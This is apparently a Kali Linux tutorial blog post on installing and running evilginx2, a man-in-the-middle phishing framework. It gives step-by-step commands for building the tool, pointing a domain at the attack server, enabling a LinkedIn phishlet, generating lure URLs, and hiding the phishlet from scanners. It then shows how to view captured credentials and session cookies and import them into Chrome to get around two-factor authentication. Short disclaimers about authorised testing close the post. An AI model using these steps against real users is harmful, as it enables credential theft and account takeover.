How to Install evilginx2 on Kali Linux

In this article, we are going to learn how to install evilginx2 on Kali Linux step by step. evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows to bypass 2-factor authentication protection. This tool is a successor to Evilginx, released in 2017, which used a custom version of Nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. The present version is fully written in GO as a standalone application, which implements its own HTTP and DNS server, making it extremely easy to set up and use.

Requirement:

  • GO of version at least 1.14.0, Click Here (How to install Go on Kali Linux).
  • Linux distro (Debian, Ubuntu, Arch, Kali Linux)
  • External serve with Public IP (Optional)

Install evilginx2 on Kali Linux

Update Kali Linux

So first of all we have to update the Kali Linux before installing the evilginx2. So using following command you can update your Kali:

$ sudo apt update

evilginx2-Update-Kali

Installing from source

When GO is installed in your Kali Linux, you have to just run the following command in your terminal:

$ sudo apt-get -y install git make

How to Install evilginx2

Install evilginx2

$ git clone https://github.com/kgretzky/evilginx2.git
$ cd evilginx2
$ make
How to Install evilginx2

or install it globally:

$ sudo make install
$ sudo evilginx
How to Install evilginx2

The instructions above can also be used to update evilginx2 to the latest version. And this is the way how to Install evilginx2 on Kali Linux 2021.2.

Getting started

To get up and running, you need to first do some setting up.

At this point I assume, you’ve already registered a domain (let’s call it yourdomain.com) and you set up the nameservers (both ns1 and ns2) in your domain provider’s admin panel to point to your server’s IP (e.g. 10.0.0.1):

ns1.yourdomain.com = 10.0.0.1
ns2.yourdomain.com = 10.0.0.1

Set up your server’s domain and IP using the following commands:

config domain yourdomain.com
config ip 10.0.0.1

Now you can set up the phishlet you want to use. For the sake of this short guide, we will use a LinkedIn phishlet. Set up the hostname for the phishlet (it must contain your domain obviously):

phishlets hostname linkedin my.phishing.hostname.yourdomain.com

And now you can enable the phishlet, which will initiate automatic retrieval of LetsEncrypt SSL/TLS certificates if none are locally found for the hostname you picked:

phishlets enable linkedin

Your phishing site is now live. Think of the URL, you want the victim to be redirected to on successful login and get the phishing URL like this (victim will be redirected to https://www.google.com):

lures create linkedin
lures edit 0 redirect_url https://www.google.com
lures get-url 0

Running phishlets will only respond to phishing links generating for specific lures, so any scanners who scan your main domain will be redirected to the URL specified as redirect_url under config. If you want to hide your phishlet and make it not respond even to valid lure phishing URLs, use phishlet hide/unhide <phishlet> command.

You can monitor captured credentials and session cookies with:

sessions

To get detailed information about the captured session, with the session cookie itself (it will be printed in JSON format at the bottom), select its session ID:

sessions <id>

The captured session cookie can be copied and imported into the Chrome browser, using the EditThisCookie extension.

Disclaimer

I am very much aware that Evilginx can be used for nefarious purposes. This work is merely a demonstration of what adept attackers can do. It is the defender’s responsibility to take such attacks into consideration and find ways to protect their users against this type of phishing attack. Evilginx should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.

Conclusion

In this article, we know how to Install evilginx2 on Kali Linux 2021.1. Evilginx should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.

IMPORTANT THINGS TO REMEMBER

  • This article was written only for educational purposes.
  • The author can not be held any responsibility for damage caused by the use of these resources.
  • You will not use this information to gain unauthorized access or any other legal activity.

Read also Disclaimer

If you are using any illegal activities using these techniques kalilinuxtutorial.com can’t hold any responsibility for your action.
This blog only for educational purposes where you will learn about Kali Linux how it works and how you can install any tools in Kali Linux.

Finally

If you have any questions about this article, any feedback, suggestions, or if you want to share your thoughts, please feel free to comment below.
If you want to speak with us directly you can Contact Us.

About The Author

Avatar

Leave a Reply

Your email address will not be published.